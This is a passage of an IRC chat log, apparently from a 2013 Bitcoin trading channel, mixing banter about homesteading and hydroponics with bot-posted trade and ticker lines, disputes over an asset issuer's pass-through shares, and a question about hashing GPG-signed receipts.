well, i know people who do it like that here, myself helped to build a cabin (only power tool was the chainsaw to chop down the trees, axes from that on for everything) Feb 21 14:39:08 milked the goats, lol Feb 21 14:39:13 when that video was made... 3,556,946,153 Feb 21 14:39:29 hahaa Feb 21 14:39:36 meh... Feb 21 14:39:45 why bother ... Feb 21 14:40:14 I mean that is whole point... we dont have to anymore... Feb 21 14:40:19 pfft Feb 21 14:40:26 unpasteurized Feb 21 14:40:29 good luck Feb 21 14:40:49 mind you I have had whole milk before Feb 21 14:40:53 lol Feb 21 14:40:56 lol, ur mom fed you unpasteurized milk Feb 21 14:41:01 less you having sex with the goat Feb 21 14:41:02 at least i hope Feb 21 14:41:04 ... or cow Feb 21 14:41:06 lol Feb 21 14:41:17 Did she ? Feb 21 14:41:24 are you sure I wasnt bottle fed? Feb 21 14:41:27 lol Feb 21 14:42:13 I prefer the modern world in many ways over the ancient Feb 21 14:42:22 ... just a lot easier to live Feb 21 14:42:24 I like that Feb 21 14:42:42 dentistry Feb 21 14:42:46 especially Feb 21 14:42:54 you grow it all? Feb 21 14:43:02 every last thing you eat? Feb 21 14:43:09 wow nice Feb 21 14:43:24 oh... so no Feb 21 14:43:33 ya... making your own bread be a bitch Feb 21 14:43:39 get the wheat Feb 21 14:43:42 grind it up Feb 21 14:43:45 etc etc Feb 21 14:43:53 few people live like that today Feb 21 14:43:56 very few Feb 21 14:44:19 You need some space Feb 21 14:44:24 ya they should Feb 21 14:44:40 ... bastards giving farmers crops that can't reseed Feb 21 14:44:52 that is just tip of the iceberg Feb 21 14:45:22 is it 420 selling heirloom veggie seeds for bitcoin? Feb 21 14:45:46 ya youd hate to think if the seed all failed what do you do then? Feb 21 14:46:21 If I had more space I'd do more hydroponics Feb 21 14:46:37 we had a small fish and veggie set up at my last school Feb 21 14:46:51 got a few fish and lots of tomatoes and lettuce from it Feb 21 14:47:06 pretty efficient Feb 21 14:47:19 did a year course on that Feb 21 14:47:34 ... lots of issues with it Feb 21 14:47:42 but doable Feb 21 14:47:55 use some miners to heat it Feb 21 14:47:56 lol Feb 21 14:48:18 hehe Feb 21 14:49:41 lol Feb 21 14:49:44 this week lol Feb 21 14:49:47 cripes Feb 21 14:49:54 dude 1 a day or more Feb 21 14:49:56 hahaha Feb 21 14:50:28 man... get some veg in ya Feb 21 14:50:34 everyday Feb 21 14:51:06 get fresh stuff Feb 21 14:51:44 I eat salad twice a day... still a fat fuck. Feb 21 14:52:05 ... damn cereal Feb 21 14:52:17 it aint the meat it is bread that gets me Feb 21 14:52:31 ya that is good Feb 21 14:52:37 terrible for ya Feb 21 14:52:57 bread is also a nasty one Feb 21 14:53:04 too good to give up Feb 21 14:54:15 [MPEX] [S.MPOE] 19570 @ 0.00063647 = 12.4557 BTC [+] Feb 21 14:54:16 [MPEX] [S.MPOE] 5000 @ 0.00063911 = 3.1956 BTC [+] Feb 21 14:54:22 [MPEX] [S.MPOE] 23540 @ 0.00063912 = 15.0449 BTC [+] Feb 21 14:57:19 [BTCTC] [S.BBET-PT] 3 @ 0.00299 = 0.009 BTC [+] Feb 21 15:00:12 no doubt... till your electricity costs for the lamps get the cops coming Feb 21 15:00:35 Pretty much anything can be hydro Feb 21 15:00:43 just need the right medium Feb 21 15:00:55 I dont know about weed. Feb 21 15:01:16 but the key is water flow temp and nutrients Feb 21 15:01:28 there are many ways to set up hydro Feb 21 15:01:55 and keeping things clean Feb 21 15:02:14 doesn't take much to screw up a greenhouse Feb 21 15:02:45 also get a good book on house plant pests Feb 21 15:02:55 and be away of the signs for them Feb 21 15:03:06 mealy bug spider mites scale etc Feb 21 15:03:16 white fly Feb 21 15:03:19 aphids Feb 21 15:03:37 if you do it right should never get infestations Feb 21 15:03:56 prevention best solution Feb 21 15:03:59 [MPEX] [S.MPOE] 5000 @ 0.00063621 = 3.1811 BTC [-] Feb 21 15:04:00 [MPEX] [S.MPOE] 8200 @ 0.0006362 = 5.2168 BTC [-] Feb 21 15:04:01 [MPEX] [S.MPOE] 6700 @ 0.00063234 = 4.2367 BTC [-] Feb 21 15:04:07 that means sterilization of the soil Feb 21 15:04:09 etc Feb 21 15:04:34 or keeping water flowing properly Feb 21 15:04:35 etc Feb 21 15:04:48 ... so many little signs if you have read up on it Feb 21 15:05:07 you can tell immediately when any plant is having issues Feb 21 15:05:17 at any stage Feb 21 15:05:26 ;;ticker Feb 21 15:05:26 BTCUSD ticker | Best bid: 29.57899, Best ask: 29.60001, Bid-ask spread: 0.02102, Last trade: 29.60001, 24 hour volume: 31344.00259639, 24 hour low: 29.05809, 24 hour high: 29.87035, 24 hour vwap: 29.61812 Feb 21 15:05:49 color, leave shape, size etc Feb 21 15:06:18 some great books put out by US GOv Feb 21 15:06:21 on this stuff Feb 21 15:06:42 [BTCTC] [BTC-BOND] 7 @ 0.00999 = 0.0699 BTC [-] Feb 21 15:17:39 nope Feb 21 15:17:49 stay away from Durian Feb 21 15:17:53 gov books? Feb 21 15:17:59 hmmm let me see Feb 21 15:21:46 http://vric.ucdavis.edu/pdf/greenhouse_vegproduction.pdf Feb 21 15:21:59 check the bibliography Feb 21 15:22:07 Ontario Feb 21 15:22:15 is a great resource for Feb 21 15:22:21 info on farming Feb 21 15:22:28 particularly greenhouse Feb 21 15:22:35 also try state level Feb 21 15:22:40 Ohio NY Feb 21 15:22:41 etc Feb 21 15:22:45 Michigan Feb 21 15:22:56 and universities also put out free publications Feb 21 15:30:49 http://www.colostate.edu/Dept/CoopExt/Adams/gh/pdf/Intro_Hydroponics.pdf <-- nice little powerpoint on the key ideas you need to learn Feb 21 15:35:14 [MPEX] [S.MPOE] 610 @ 0.00063912 = 0.3899 BTC [+] Feb 21 15:35:16 [MPEX] [S.MPOE] 4321 @ 0.00063939 = 2.7628 BTC [+] Feb 21 15:35:20 [MPEX] [S.MPOE] 5119 @ 0.0006394 = 3.2731 BTC [+] Feb 21 15:37:26 [MPEX] [S.DICE] 1827 @ 0.00576725 = 10.5368 BTC [+] Feb 21 15:38:49 [MPEX] [S.DICE] 500 @ 0.0060899 = 3.045 BTC [+] Feb 21 15:38:51 [MPEX] [S.DICE] 350 @ 0.00609 = 2.1315 BTC [+] Feb 21 15:41:18 [MPEX] [S.MPOE] 5995 @ 0.0006394 = 3.8332 BTC [+] Feb 21 15:41:20 [MPEX] [S.MPOE] 17805 @ 0.00064089 = 11.411 BTC [+] Feb 21 15:45:11 [MPEX] [S.MPOE] 5095 @ 0.00064089 = 3.2653 BTC [+] Feb 21 15:45:13 [MPEX] [S.MPOE] 5000 @ 0.00064221 = 3.2111 BTC [+] Feb 21 15:45:15 [MPEX] [S.MPOE] 7300 @ 0.00064223 = 4.6883 BTC [+] Feb 21 15:45:16 [MPEX] [S.MPOE] 4755 @ 0.0006436 = 3.0603 BTC [+] Feb 21 15:48:51 [BTCTC] [BTC-MINING] 2 @ 0.04001 = 0.08 BTC [+] Feb 21 15:48:53 [BTCTC] [BTC-MINING] 4 @ 0.04 = 0.16 BTC [-] Feb 21 15:50:19 [MPEX] [S.MPOE] 11245 @ 0.0006436 = 7.2373 BTC [+] Feb 21 15:50:21 [MPEX] [S.MPOE] 7855 @ 0.00064361 = 5.0556 BTC [+] Feb 21 15:56:08 assbot only does the mpex exchange or all other exchanges just really dead? Feb 21 15:56:20 i say this as i see btctc.. never mind Feb 21 15:57:53 [MPEX] [S.MPOE] 4321 @ 0.00063258 = 2.7334 BTC [-] Feb 21 15:57:55 [MPEX] [S.MPOE] 12471 @ 0.00063234 = 7.8859 BTC [-] Feb 21 15:57:56 [MPEX] [S.MPOE] 5308 @ 0.00062979 = 3.3429 BTC [-] Feb 21 16:01:05 [MPEX] [S.MPOE] 4321 @ 0.0006436 = 2.781 BTC [+] Feb 21 16:01:07 [MPEX] [S.MPOE] 2329 @ 0.00064361 = 1.499 BTC [+] Feb 21 16:05:01 assbot doesnt show Bitfunder Feb 21 16:05:01 Chaang-Noi there's also havelock,, but not bitfunder yet Feb 21 16:05:06 nor LTCGlobal Feb 21 16:05:21 nor cryptostocks Feb 21 16:08:11 ;;bc,stats Feb 21 16:08:14 Current Blocks: 222378 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1397 blocks | Next Difficulty In About: 1 week, 0 days, 6 hours, 37 minutes, and 30 seconds | Next Difficulty Estimate: 4413585.84178 | Estimated Percent Change: 20.88666 Feb 21 16:08:44 that's a 5% jump in est % change in one day Feb 21 16:09:31 5 point jump, to be clear Feb 21 16:11:13 [MPEX] [S.MPOE] 4321 @ 0.00062991 = 2.7218 BTC [-] Feb 21 16:11:19 [MPEX] [S.MPOE] 6493 @ 0.00062979 = 4.0892 BTC [-] Feb 21 16:11:20 [MPEX] [S.MPOE] 3786 @ 0.00062978 = 2.3843 BTC [-] Feb 21 16:13:47 stock trading seems slower now than 6 months ago? Feb 21 16:14:21 i think the btcusd ratio is getting all the attention currently Feb 21 16:14:32 ahh yeah Feb 21 16:19:23 [MPEX] [S.MPOE] 3964 @ 0.00062978 = 2.4964 BTC [-] Feb 21 16:19:25 [MPEX] [S.MPOE] 11652 @ 0.00062951 = 7.3351 BTC [-] Feb 21 16:20:37 last second bids for asicminer here if anyone wants https://bitcointalk.org/index.php?topic=145333.20 Feb 21 16:21:38 outbid already :) Feb 21 16:21:44 you dont have faith in asicminer? Feb 21 16:22:06 i don't like paying someone else to do what i can do myself Feb 21 16:27:21 you can make asic chips? Feb 21 16:29:00 ... Feb 21 16:32:15 [MPEX] [S.MPOE] 3309 @ 0.0006364 = 2.1058 BTC [+] Feb 21 16:33:04 [MPEX] [S.MPOE] 1012 @ 0.0006364 = 0.644 BTC [+] Feb 21 16:33:06 [MPEX] [S.MPOE] 10288 @ 0.00063654 = 6.5487 BTC [+] Feb 21 16:36:35 [MPEX] [S.MPOE] 3498 @ 0.00062951 = 2.202 BTC [-] Feb 21 16:36:37 [MPEX] [S.MPOE] 4321 @ 0.00062781 = 2.7128 BTC [-] Feb 21 16:36:42 [MPEX] [S.MPOE] 15915 @ 0.0006278 = 9.9914 BTC [-] Feb 21 16:36:44 [MPEX] [S.MPOE] 1066 @ 0.00062778 = 0.6692 BTC [-] Feb 21 16:44:42 [MPEX] [S.MPOE] 4321 @ 0.00062802 = 2.7137 BTC [+] Feb 21 16:44:44 [MPEX] [S.MPOE] 4728 @ 0.00062778 = 2.9681 BTC [-] Feb 21 16:48:23 ;;ticker Feb 21 16:48:23 BTCUSD ticker | Best bid: 29.67889, Best ask: 29.67890, Bid-ask spread: 0.00001, Last trade: 29.67889, 24 hour volume: 32569.09251823, 24 hour low: 29.31000, 24 hour high: 29.87035, 24 hour vwap: 29.64323 Feb 21 16:48:37 ;;calc 29.67/28.66 Feb 21 16:48:37 1.03524075366 Feb 21 16:58:08 ;;ticker Feb 21 16:58:09 BTCUSD ticker | Best bid: 29.65001, Best ask: 29.67990, Bid-ask spread: 0.02989, Last trade: 29.65001, 24 hour volume: 32598.32500006, 24 hour low: 29.31100, 24 hour high: 29.87035, 24 hour vwap: 29.64408 Feb 21 17:13:59 [MPEX] [S.MPOE] 8950 @ 0.00062779 = 5.6187 BTC [+] Feb 21 17:17:39 [MPEX] [S.MPOE] 7050 @ 0.00062779 = 4.4259 BTC [+] Feb 21 17:17:41 [MPEX] [S.MPOE] 15406 @ 0.00062778 = 9.6716 BTC [-] Feb 21 17:17:42 [MPEX] [S.MPOE] 5644 @ 0.00062729 = 3.5404 BTC [-] Feb 21 17:18:56 [BTCTC] [GSDPT] 99 @ 0.00619 = 0.6128 BTC [+] Feb 21 17:21:04 [MPEX] [S.DICE] 8107 @ 0.00608999 = 49.3715 BTC [-] Feb 21 17:21:05 [MPEX] [S.DICE] 19905 @ 0.00609 = 121.2215 BTC [+] Feb 21 17:27:02 case you missed it Feb 21 17:27:03 https://bitcointalk.org/index.php?topic=145640.0 Feb 21 17:28:47 urrency exchange using bitcoin? Feb 21 17:28:52 *c Feb 21 17:29:03 have you made any money there? Feb 21 17:29:50 wow i did not know you did that Feb 21 17:30:06 1000x leverage, god damn, i would ahve shorted silver had i known Feb 21 17:30:12 ... Feb 21 17:30:42 never too low to sell, never too high to buy Feb 21 17:30:55 yeah, i dont have time now but i will look into it Feb 21 17:35:02 i have 500btc account with 1000 leverage, doesnt mean i go all in. Feb 21 17:35:31 u fail maffs. Feb 21 17:36:05 mebbe Feb 21 17:39:31 i can go short/long with ~6 lots with that, which is 0.6 MIO units Feb 21 17:40:39 [MPEX] [S.MPOE] 4321 @ 0.0006291 = 2.7183 BTC [+] Feb 21 17:40:40 [MPEX] [S.MPOE] 16000 @ 0.00062943 = 10.0709 BTC [+] Feb 21 17:40:42 [MPEX] [S.MPOE] 729 @ 0.00062944 = 0.4589 BTC [+] Feb 21 17:41:26 you mean the opposite. Feb 21 17:42:38 rofl Feb 21 17:42:47 you forgot our convo from yesterday? Feb 21 17:43:40 not worth going into it if you forget so quickly Feb 21 17:45:30 wishing me luck for my personal trading? well thanks, what can i say. Feb 21 17:47:00 yes like you will make any real money with your silver sellfofs Feb 21 17:47:16 i back the exchange? Feb 21 17:47:20 where does it say that Feb 21 17:48:07 yes, i tell em to open 500btc account while i hold the funds Feb 21 17:48:13 they back it with their money Feb 21 17:48:42 you blow, i send them your btc Feb 21 17:48:46 you win, they send me more Feb 21 17:49:34 its a great way to pump more money into btc Feb 21 17:49:40 if we can get some serious earners Feb 21 17:50:28 (working on it) ;) Feb 21 17:51:12 you can Feb 21 17:51:29 i think usagi wants physical silver.... Feb 21 17:52:19 not at all. Feb 21 17:52:28 [BTCTC] [BTC-BOND] 13 @ 0.01 = 0.13 BTC [+] Feb 21 17:52:42 i figured out we are at a low for the last 3 years in silver. Feb 21 17:52:43 right? Feb 21 17:52:59 sell! Feb 21 17:53:04 bigh high! Feb 21 17:53:24 i am. sell low buy high! Feb 21 17:53:27 I'm asking about historical data Feb 21 17:54:10 same shit goes for btc heheh Feb 21 17:55:17 http://www.reddit.com/r/Bitcoin/comments/18xoab/bfl_update_02202013_820_pst/ Feb 21 17:56:06 last call Feb 21 17:56:07 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Feb 21 17:56:09 hehe Feb 21 17:57:58 yeah im well into that on the no Feb 21 17:58:57 i did well on the silver one, it paid like 24% right before it closed :) Feb 21 17:59:04 124% rather Feb 21 17:59:08 :) Feb 21 18:00:09 i have not watched it, nor do I know metals Feb 21 18:00:19 I just knew it 2007 it was time to buy, so I did. Feb 21 18:05:15 ;;slap deadweasel Feb 21 18:08:11 [MPEX] [S.MPOE] 4321 @ 0.00062803 = 2.7137 BTC [-] Feb 21 18:08:13 [MPEX] [S.MPOE] 61 @ 0.00062779 = 0.0383 BTC [-] Feb 21 18:10:29 ;;ticker Feb 21 18:10:30 BTCUSD ticker | Best bid: 29.50001, Best ask: 29.56999, Bid-ask spread: 0.06998, Last trade: 29.57498, 24 hour volume: 32461.92968870, 24 hour low: 29.31100, 24 hour high: 29.87035, 24 hour vwap: 29.64290 Feb 21 18:10:44 ;;slap usagi Feb 21 18:10:52 lol Feb 21 18:11:28 wtf is an entrain anyway? Feb 21 18:15:07 ;;slap Chaang-Noi Feb 21 18:15:52 sorry usagi i just wanted to see gribble hurt you, seems i failed Feb 21 18:16:14 im waiting to hear back from nefario or his lawyer Feb 21 18:16:43 i dont think he really had a lawyer Feb 21 18:17:00 i think he just paid some guy for a bit of advice... Feb 21 18:19:25 i did my lawyer tried to contact the lawyer he claimed he had, no responce Feb 21 18:19:35 meaning i dont think he was really acting for nefario like he claimed Feb 21 18:19:46 yeah, that is what im saying Feb 21 18:19:58 tempted to sell 100 btc :/ Feb 21 18:21:14 hmm, i kick myself everytime i sell though... Feb 21 18:24:23 hey james Feb 21 18:24:43 don't quite understand the bitbet Feb 21 18:24:45 hrm Feb 21 18:24:50 it says "customers" Feb 21 18:24:57 that is plural Feb 21 18:25:17 customers would also imply somone who has paid for said item Feb 21 18:25:31 so if supplied gratis to a dev that counts? Feb 21 18:25:34 or no Feb 21 18:25:48 not a customer, then no Feb 21 18:26:03 so - the dev pays $1 - they are a customer? Feb 21 18:26:04 regular sixpack joe counts Feb 21 18:26:18 this has the potential to get very sticky Feb 21 18:26:28 i dont think it will be any mess at all Feb 21 18:27:35 da wat? Feb 21 18:28:24 those justice bets probly have more holes in them than the BFL one Feb 21 18:29:06 bets where "if one of these 3 happen" are lame Feb 21 18:30:38 submit a better one, what is the problem? Feb 21 18:34:13 how do i access these btc-tc payouts i keep getting emailed about again Feb 21 18:34:25 i just created an account Feb 21 18:42:10 jcpham: see if you can find an email titled such as "BTC-TC New Account Created - Claim your [assetnamehere] shares!" it contains the account info for specified asset Feb 21 18:42:35 nothing like that i checked Feb 21 18:42:50 i contacted their support Feb 21 18:43:00 [MPEX] [S.MPOE] 3300 @ 0.00062929 = 2.0767 BTC [+] Feb 21 18:53:26 god i love shopping in this country. Feb 21 18:55:52 hmm Feb 21 18:56:24 can someone sell me 1 share of tu.silver here in otc gpg signed contract, you get keep holding the share for me Feb 21 18:57:04 basically like a broker Feb 21 18:57:30 [MPEX] [S.MPOE] 1021 @ 0.00062929 = 0.6425 BTC [+] Feb 21 18:57:32 [MPEX] [S.MPOE] 16000 @ 0.00062943 = 10.0709 BTC [+] Feb 21 18:57:33 [MPEX] [S.MPOE] 529 @ 0.00062944 = 0.333 BTC [+] Feb 21 18:57:38 i give you an address? Feb 21 18:57:47 i thought you give me an address and i send you wahtever the ask is Feb 21 19:00:23 that comes later Feb 21 19:00:30 first he buy, then you send div. buy first! Feb 21 19:00:41 you can keep the divs going towards your 200 btc debt to me Feb 21 19:01:03 right. Feb 21 19:01:08 anywho address? Feb 21 19:02:09 deal. Feb 21 19:02:33 now i get to ask you questions. Feb 21 19:04:19 [MPEX] [S.MPOE] 4321 @ 0.00062805 = 2.7138 BTC [-] Feb 21 19:04:20 [MPEX] [S.MPOE] 15939 @ 0.00062779 = 10.0063 BTC [-] Feb 21 19:04:26 [MPEX] [S.MPOE] 390 @ 0.00062778 = 0.2448 BTC [-] Feb 21 19:05:24 first question; https://bitcointalk.org/index.php?topic=137459.msg1546396#msg1546396 Feb 21 19:07:21 kakobrekla the guy with the gold bars, galt or w/e... he has pix of the loot, serials and whatnot. Feb 21 19:07:51 i wanna see maffs Feb 21 19:11:02 http://jonmillward.com/blog/studies/deep-inside-a-study-of-10000-porn-stars/ Feb 21 19:11:15 dat title... Feb 21 19:11:16 saw that, shorter careers, quicker anal Feb 21 19:11:59 nice way of going about extracting a grant out of jacking off all day. Feb 21 19:13:13 wish I'd thought about it first Feb 21 19:15:25 "Foxconn: Our hiring freeze has nothing to do with iPhone 5" Feb 21 19:15:36 tomorrow's headline will be Foxconn: Our hiring freeze has everything to do with iPhone 5 Feb 21 19:15:43 cuz thats how all foxconn news goes Feb 21 19:19:33 my outsider impression of porn industry is like everyone is utterly bored there Feb 21 19:19:47 [MPEX] [S.MPOE] 4321 @ 0.00062927 = 2.7191 BTC [+] Feb 21 19:19:49 [MPEX] [S.MPOE] 8579 @ 0.00062943 = 5.3999 BTC [+] Feb 21 19:20:00 yes Feb 21 19:20:14 always the problem of finitive amounts of holes to fuck Feb 21 19:20:16 jurov not even that far off. Feb 21 19:24:30 [HAVELOCK] [KCIM] 2 @ 0.99 = 1.98 BTC [-] Feb 21 19:31:55 http://ro.stiri.yahoo.com/cna-fost-executat-silit-antena-3-pentru-plata-122221700.html Feb 21 19:32:06 you won't be reading that cause it's in romanian, but! Feb 21 19:32:18 the romanian FCC fined a local tv station. Feb 21 19:32:22 tv station sued the fcc, and won. Feb 21 19:32:31 court issued punitive damages Feb 21 19:32:46 the FCC employees are now not receiving their pay because the FCC is being executed for the amount. Feb 21 19:33:08 reasons to love romania. Feb 21 19:33:37 nice Feb 21 19:36:16 [MPEX] [S.MPOE] 4321 @ 0.00062786 = 2.713 BTC [-] Feb 21 19:36:18 [MPEX] [S.MPOE] 8229 @ 0.00062778 = 5.166 BTC [-] Feb 21 19:38:53 ;;ticker Feb 21 19:38:53 BTCUSD ticker | Best bid: 29.77060, Best ask: 29.87777, Bid-ask spread: 0.10717, Last trade: 29.77060, 24 hour volume: 32710.64861839, 24 hour low: 29.31100, 24 hour high: 29.87777, 24 hour vwap: 29.64796 Feb 21 19:40:17 ok thanks usagi Feb 21 19:40:27 will see what dt says then ;) Feb 21 19:43:39 I see the farce that is glbse carries on - "lost the flash drive containing the gpg keys" .... Feb 21 19:49:28 [HAVELOCK] [KCIM] 4 @ 0.825 = 3.3 BTC [-] Feb 21 19:49:36 [MPEX] [S.MPOE] 5881 @ 0.00062778 = 3.692 BTC [-] Feb 21 19:49:38 [MPEX] [S.MPOE] 6116 @ 0.00062762 = 3.8385 BTC [-] Feb 21 19:49:41 [MPEX] [S.MPOE] 924 @ 0.0006273 = 0.5796 BTC [-] Feb 21 19:50:41 markedathome eh ?! news to me. what's this ? Feb 21 19:51:35 mircea_popescu: https://bitcointalk.org/index.php?topic=115669.msg1540424#msg1540424 Feb 21 19:57:39 http://trilema.com/2013/why-love-romania-a-guide-for-the-us-citizen/ Feb 21 20:03:47 [MPEX] [S.MPOE] 3200 @ 0.00062908 = 2.0131 BTC [+] Feb 21 20:12:52 [BTCTC] [BTC-GOLD] 10 @ 0.0213 = 0.213 BTC [-] Feb 21 20:23:56 [MPEX] [S.MPOE] 1121 @ 0.00062908 = 0.7052 BTC [+] Feb 21 20:23:58 [MPEX] [S.MPOE] 7421 @ 0.00062943 = 4.671 BTC [+] Feb 21 20:23:59 [MPEX] [S.MPOE] 16208 @ 0.00062944 = 10.202 BTC [+] Feb 21 20:37:09 asicminer update: https://bitcointalk.org/index.php?topic=99497.msg1546642#msg1546642 Feb 21 20:39:39 [MPEX] [S.MPOE] 2834 @ 0.00062944 = 1.7838 BTC [+] Feb 21 20:43:28 [MPEX] [S.MPOE] 4321 @ 0.00063194 = 2.7306 BTC [+] Feb 21 20:43:29 [MPEX] [S.MPOE] 1879 @ 0.00063195 = 1.1874 BTC [+] Feb 21 20:44:35 "Self-mining is an option but not emergent plan. Besides having fluctuation and being the target for cyber attack, we do not want to be involved in voting with our portion of the network yet." Feb 21 20:44:39 that sounds ominous enough. Feb 21 20:46:33 http://s2.postimage.org/okxft6fx5/2013_01_15_20_44_44.png Feb 21 20:46:34 rofl Feb 21 20:46:38 this is beyond retarded Feb 21 20:49:15 pennybot pushing up Feb 21 20:49:22 i get uncomfortable just looking at micon Feb 21 20:49:47 nvm being heckled by him Feb 21 20:51:44 "... or other issues" -- yeah, he's being stalked by a troll... Feb 21 20:56:00 [MPEX] [S.MPOE] 15421 @ 0.00063195 = 9.7453 BTC [+] Feb 21 20:56:01 [MPEX] [S.MPOE] 1964 @ 0.00063401 = 1.2452 BTC [+] Feb 21 20:56:03 [MPEX] [S.MPOE] 39350 @ 0.00063485 = 24.9813 BTC [+] Feb 21 20:56:03 [MPEX] [S.MPOE] 4865 @ 0.00063548 = 3.0916 BTC [+] Feb 21 20:56:10 wow micon... thy dude is in a other galaxy Feb 21 20:56:11 All confirmation letters had been sent more than one month ago. Please check your spam folder if you did not find it. And please PM/mail me if you still could not. Feb 21 20:56:14 what does that mean Feb 21 20:56:15 this* Feb 21 20:56:55 do you need to reply to that to confirm shares? the only email I got just said 'you have N shares' Feb 21 21:09:26 ;;ticker Feb 21 21:09:27 BTCUSD ticker | Best bid: 29.90700, Best ask: 29.92700, Bid-ask spread: 0.02000, Last trade: 29.92700, 24 hour volume: 33677.34763086, 24 hour low: 29.31100, 24 hour high: 29.96800, 24 hour vwap: 29.66112 Feb 21 21:11:25 so close Feb 21 21:11:46 volume doesn't cut it. people will dump, backslide Feb 21 21:11:55 but that's good too! Feb 21 21:18:29 I don't get it, when does this rise end? Feb 21 21:18:37 when a whale gets bored and dumps all? Feb 21 21:18:46 it's not infinite.... Feb 21 21:18:55 yes is it Feb 21 21:19:26 how genius whas satoshi omg Feb 21 21:19:56 economy nobel the day he'll come back Feb 21 21:27:19 https://bitcointalk.org/index.php?topic=144622.0 this is kinda concerning Feb 21 21:27:50 does mircea_popescu really think the only kind of trading is 'hoard forever' or is -pr off meds Feb 21 21:28:12 [MPEX] [S.MPOE] 4321 @ 0.00063027 = 2.7234 BTC [-] Feb 21 21:28:14 [MPEX] [S.MPOE] 14666 @ 0.00063006 = 9.2405 BTC [-] Feb 21 21:28:21 [MPEX] [S.MPOE] 2700 @ 0.00062836 = 1.6966 BTC [-] Feb 21 21:28:28 [MPEX] [S.MPOE] 15076 @ 0.0006273 = 9.4572 BTC [-] Feb 21 21:28:29 [MPEX] [S.MPOE] 25137 @ 0.00062729 = 15.7682 BTC [-] Feb 21 21:28:41 regardless you would have to be brain dead to buy g.mpoe Feb 21 21:32:12 which I crecall being a key feature of past DT enterprises Feb 21 21:32:56 srsly, quoting from the same post - https://bitcointalk.org/index.php?topic=144622.msg1542790#msg1542790 Feb 21 21:33:06 "Arbitrage is a healthy thing for the market it brings down the spread and it's part of the free market hence I encourage it. I arbitrage when I see that the spreads are great and hence causes problems for people who want to sell/buy the shares." Feb 21 21:33:29 "This is some of the arguments which were used against Erik when he issued more shares, You are arguieing out of a speculation point of view, this is not investing but gambling. " Feb 21 21:33:39 [MPEX] [S.MPOE] 4321 @ 0.00062752 = 2.7115 BTC [+] Feb 21 21:33:41 [MPEX] [S.MPOE] 5379 @ 0.00062729 = 3.3742 BTC [-] Feb 21 21:34:06 "For a investor the short term market price should not matter other then as a way to buy or sell at that price, as long as the underlying assets are the same a investor should not see a problem with issuing more shares." Feb 21 21:35:20 the first quote sounds like he's going to 'arbitrage' his own passthrough Feb 21 21:35:49 [MPEX] [S.DICE] 2650 @ 0.00597198 = 15.8257 BTC [-] Feb 21 21:40:42 isnt that what he does? Feb 21 21:42:59 That is what all market makers do, they scalp the difference. What is the problem? Feb 21 21:43:36 he controls the market Feb 21 21:43:46 he can add new stock at any time Feb 21 21:43:48 it says that on the labe Feb 21 21:43:49 l Feb 21 21:43:52 You can buy from mpex then Feb 21 21:44:02 yes, it does Feb 21 21:45:30 Asset Name G.SDICE Feb 21 21:45:30 Asset Issuer DeaDTerra Feb 21 21:45:30 Issuer may Increase Shares: Yes, without vote. Feb 21 21:45:46 its not a bad model really, make up a bunch of really shitty vehicles that outright steal from investors, sit back and profit from the endless supply of retards Feb 21 21:46:02 are you trolling? Feb 21 21:46:09 no Feb 21 21:46:33 Don't be a cheap ass and buy from mpex then Feb 21 21:46:41 jborkl: derp Feb 21 21:46:44 i'll make one comment. if you don't like it, don't buy it. Feb 21 21:46:53 double derp Feb 21 21:48:29 [HAVELOCK] [SDICE] 1 @ 0.699 BTC [-] Feb 21 21:48:29 whats scary is when someone shows up to pick it apart mircea_popescu rides in on his white horse to defend DT Feb 21 21:49:31 [BTCTC] [S.MPOE-PT] 1000 @ 0.00064 = 0.64 BTC [-] Feb 21 21:49:33 [BTCTC] [S.MPOE-PT] 1000 @ 0.00063 = 0.63 BTC [-] Feb 21 21:49:35 [BTCTC] [S.MPOE-PT] 100 @ 0.00063 = 0.063 BTC [-] Feb 21 21:50:02 i converted some stuff into G.SDICE and wait for opportunity Feb 21 21:50:23 since i noticed DT often lags and ask side dries up completely Feb 21 21:50:50 cuz he is doing it seriously u know. no filthy arbitration Feb 21 21:51:18 *G.MPOE i mean Feb 21 21:51:19 im not saying he has but he's left the door open Feb 21 21:51:40 can someone buy shares on a passthru, and then afterwards buy an MPEX account and have those shares converted into the new MPEX account? Feb 21 21:52:00 yes, DT allows that. Feb 21 21:52:10 fees? Feb 21 21:52:25 or just a gentlemanly tip? Feb 21 21:52:34 free. but if you try to move there and back often he can refuse it. Feb 21 21:55:07 ;;bc,stats Feb 21 21:55:10 Current Blocks: 222418 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1357 blocks | Next Difficulty In About: 6 days, 23 hours, 52 minutes, and 34 seconds | Next Difficulty Estimate: 4403316.2215 | Estimated Percent Change: 20.60537 Feb 21 21:56:34 Don't buy assets. BTC is risky enough. Feb 21 21:56:44 my two cents, worth very little Feb 21 21:57:13 Well it's two cent... Feb 21 21:57:55 you'll get swayed eventually.. better do it with proper research Feb 21 21:58:42 [MPEX] [S.MPOE] 10100 @ 0.00062774 = 6.3402 BTC [+] Feb 21 21:58:43 [MPEX] [S.MPOE] 946 @ 0.00062729 = 0.5934 BTC [-] Feb 21 22:00:22 well I did it, now I'm stuck with a few thousand SDICE shares that nobody wants. Feb 21 22:00:35 because I did before erik decided to dump another 2 milliion or so Feb 21 22:02:25 [BTCTC] [S.MPOE-PT] 1000 @ 0.00062 = 0.62 BTC [-] Feb 21 22:02:28 [BTCTC] [S.MPOE-PT] 100 @ 0.00062 = 0.062 BTC [-] Feb 21 22:02:30 [BTCTC] [S.MPOE-PT] 3900 @ 0.00062 = 2.418 BTC [-] Feb 21 22:04:44 mircea_popescu: you there ? Feb 21 22:05:49 topace yea Feb 21 22:06:02 excellent.. got a question for you regarding the PUSH receipts... Feb 21 22:06:07 shoot Feb 21 22:06:08 is it possible to get a UNIQUE identifier added to it ? Feb 21 22:06:26 they are already unique, just hash them Feb 21 22:06:29 so i could, say, accept a pasted receipt into my website as a single-use receipt, to automatically credit an account Feb 21 22:07:17 wouldnt an identical push of an identical number of units from identical fingerprint to identical fingerprint have identical receipts (and thus, identical hashes?) Feb 21 22:07:21 nope. Feb 21 22:07:27 think about it, they're gpg signed Feb 21 22:07:42 deadweasel: http://www.quickmeme.com/meme/3t355y/ Feb 21 22:07:48 if you pgp-sign the same exact message ten million times you won't get a collision Feb 21 22:08:14 hmmm Feb 21 22:08:50 so a hash of the whole receipt could be my unique identifier, to prevent people from double-posting receipts (and trying to get double the units 